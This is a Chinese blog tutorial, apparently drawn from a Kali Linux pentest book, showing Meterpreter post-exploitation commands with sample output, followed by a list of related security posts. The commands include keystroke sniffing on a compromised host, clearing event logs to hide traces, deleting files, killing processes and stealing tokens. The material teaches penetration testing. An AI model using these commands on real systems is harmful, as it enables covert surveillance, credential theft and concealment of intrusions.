Kali学习 | 漏洞利用:4.4 控制Meterpreter
Kali学习 | 漏洞利用:4.4 控制Meterpreter
- 介绍
- 操作步骤
介绍
Meterpreter是Metasploit框架中的一个杀手铜,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给用户一个控制通道。
当使用 Armitage、MSFCLI 或 MSFCONSOLE 获取到目标系统上的一个Meterpreter连接时,用户必须使用Meterpreter传递攻击载荷。
MSFCONSOLE用于管理用户的会话,而Meterpreter则是攻击载荷和渗透攻击交互。
Meterpreter包括的一些常见命令如下所示。
help:查看帮助信息。
background:允许用户在后台Meterpreter会话N-
download:允许用户从入侵主机上下载文件。
upload:允许用户上传文件到入侵主机。
execute:允许用户在入侵主机上执行命令。
shell:允许用户在入侵主机上(仅是Windows主机)运行Windows shell命令。
session -i:允许用户切换会话。
操作步骤
(1)在MSFCONSOLE上启动一个活跃的会话。
(2)通过利用系统的用户启动登录键盘输入。执行命令如下所示:
meterpreter> keyscan start
Starting the keystroke sniffer..…
从输出的信息中可以看到键盘输入嗅探已启动。
(3)捕获漏洞系统用户的键盘输入。执行命令如下所示:
meterpreter> keyscan_dump
Dumping captured keystrokes...
<Return> www.baidu.com <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
以上输出的信息表示在漏洞系统中用户输入了www.baidu.com,aaaa及回车键、退出键。
(4)停止捕获漏洞系统用户的键盘输入。执行命令如下所示:
meterpreter> keyscan_stop
Stopping the keystroke sniffer..…
从输出的信息中可以看到键盘输入嗅探已停止。
(5)删除漏洞系统上的一个文件。执行命令如下所示:
meterpreter> del exploited.docx
(6)清除漏洞系统上的事件日志。执行命令如下所示:
meterpreter> clearev
[*]Wiping 57 records from Application..
[*]Wiping 107 records from System..
[*]Wiping O records from Security...
(7)查看正在运行的进程列表。执行命令如下所示:
输出的信息显示了漏洞系统中正在运行的所有进程,包括进程的ID号、进程名、系统架构、用户及运行程序的路径等。
(8)使用kill杀死漏洞系统中指定的进程号。执行命令如下所示:
meterpreter> kill 2040
Killing:2040
(9)尝试从漏洞系统窃取一个假冒令牌。执行命令如下所示:
meterpreter>steal_token
注意:使用不同的模块,Meterpreter中的命令是不同的。有些模块中,可能不存在以上命令。
参考书籍:《Kali Linux渗透测试技术详解》
Kali学习 | 漏洞利用:4.4 控制Meterpreter相关推荐
- Kali学习 | 漏洞扫描:3.2 使用Nessus扫描漏洞
Kali学习 | 漏洞扫描:3.2 使用Nessus扫描漏洞 扫描本地漏洞 扫描网络漏洞 扫描指定Linux的系统漏洞 扫描指定Windows的系统漏洞 扫描本地漏洞 (1)新建名为Local Vul ...
- WAF绕过“小迪安全课堂笔记”信息收集,漏洞发现,漏洞利用,权限控制
WAF绕过 思维导图(全) CC 攻击与 DDOS CC WAF 绕过-信息收集之反爬虫延时代理池技术 案例 Safedog-默认拦截机制分析绕过-未开CC WAF绕过-漏洞发现之代理池指纹被动探针 ...
- Kali WIndows 漏洞利用基础篇 (探索目标主机漏洞)
通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞.因为很多教程只说了用什么漏洞去攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体 ...
- kali metasploit 漏洞利用
准备 1.安装metaploitable靶场 2.metaploitable靶场是ubuntu操作系统 清除IP sudo dhclient -r 重新获取IP sudo dhclient 重新分配一 ...
- Waf攻防-信息收集漏洞发现漏洞利用权限控制
目录 WAF的介绍 1.什么是WAF 2.WAF的分类 软件型WAF 硬件型WAF 云 WAF 网站内置的WAF 3.WAF的判断 WAF的绕过 1.信息收集 介绍 信息收集常见检测 信息收集绕过wa ...
- 渗透测试漏洞利用入门总结
渗透测试漏洞利用入门总结 漏洞利用 利用medusa获得远程服务的访问权限. 这些服务包括ssh.telnet.ftp.pc anywhere .vnc 对这些服务进行爆破的工具分别是medusa 和 ...
- Kali Linux渗透基础知识整理(三):漏洞利用
漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...
- Kali Linux 秘籍 第六章 漏洞利用
第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...
- 分享SSRF漏洞的学习和利用
前言 本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞.此漏洞并结合腾讯云的API接口,可以获取大量嘶吼服务器的敏感信息.利用这些敏感信息,又可以进行更为深入的渗透. 这篇文章将会发 ...
最新文章
- 当今主流分割网络有哪些?12篇文章一次带你看完
- ios ---常用的图片处理技术
- 求字符串中汉字的个数
- 黄聪:在C#中如何使用资源中的图片
- figure文本框乱码 matlab_Matlab给系统自动生成的窗体Figure1改名称
- 浅析Hadoop文件格式
- 又一国产开源微内核操作系统上线!源代码已开放下载
- 下载matlab安装包太慢_MATLAB 2020a商业数学中文版软件下载安装教程
- python list存储方式_python list存储
- gcn 图卷积神经网络_GCN图卷积网络入门详解
- Mysql Order By 字符串排序,mysql 字符串order by
- vue条形码,二维码,打印总结分享
- 歌曲剪辑软件测试自学,想做vlog?想剪视频?全网最良心的视频剪辑软件测评之入门篇...
- 仓库温度湿度控制措施_一般仓库的温湿度控制范围是多少合适?
- linux图片裁剪软件安卓版,照片裁剪软件下载-照片裁剪 安卓版v2.2-PC6安卓网
- mysql表的导入和导出
- 【大数据可视化分析】股吧帖子情感倾向及用户参与行为
- 微信GIF图保存到本地的方法
- 【第110期】游戏策划应聘必考题,90%的人没答对
- java实现催收系统对金额平均分,基本保证催收员的绩效一致
热门文章
- 用计算机弹出生僻字的歌,抖音生僻字是什么歌?抖音生僻字歌词注音完整版
- Node.js 4.x 入门实战视频课程【讲师辅导】-曾亮-专题视频课程
- 某考试系统逻辑漏洞打包#可改题改分数#查看大量信息
- centos发现网络连不上了,重启网络服务报错“systemctl status network.service” and “journalctl -xe” for details. [失败]
- 初识linux网络编程
- 手把手教你Linux虚拟机安装(超详细)
- css设置高度和宽度相同
- 经典算法:二叉树的建立
- linux 查看es进程,Linux---关闭Elasticsearch进程,并重新启动
- 高校学生信息管理系统